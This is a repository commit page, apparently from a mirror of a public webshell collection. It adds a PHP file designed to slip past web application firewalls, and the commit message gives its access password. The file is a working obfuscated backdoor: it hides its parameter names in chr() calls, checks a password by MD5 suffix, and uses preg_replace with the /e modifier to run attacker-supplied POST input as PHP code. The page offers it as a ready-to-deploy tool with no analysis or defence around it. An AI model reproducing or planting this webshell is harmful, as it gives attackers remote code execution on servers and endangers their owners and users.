PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Code Issues Projects Releases Wiki Activity

Create bypass-waf-2015-06-16-01.php

Browse Source 
pass : c451cc
from : zone.wooyun.org
This commit is contained in:
tennc
2015-06-16 09:16:00 +08:00
parent bdaf24523d
commit 6c2b8abb4b
1 changed files with 21 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
php/bypass-waf-2015-06-16-01.php Normal file
View File

@@ -0,0 +1,21 @@
<?php
function getMd5($md5 = null) {
$key = substr(md5($md5),26);
return $key; }
$array = array(
chr(112).chr(97).chr(115).chr(115),
chr(99).chr(104).chr(101).chr(99).chr(107),
chr(99).chr(52).chr(53).chr(49).chr(99).chr(99)
);
if ( isset($_POST) ) $request = &$_POST;
elseif ( isset($_REQUEST) ) $request = &$_REQUEST;
if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) {
if ( getMd5($request[$array[0]]) == $array[2] ) {
$token = preg_replace (
chr(47) . $array[2] . chr(47) . chr(101),
$request[$array[1]],
$array[2]
);
}
}
?>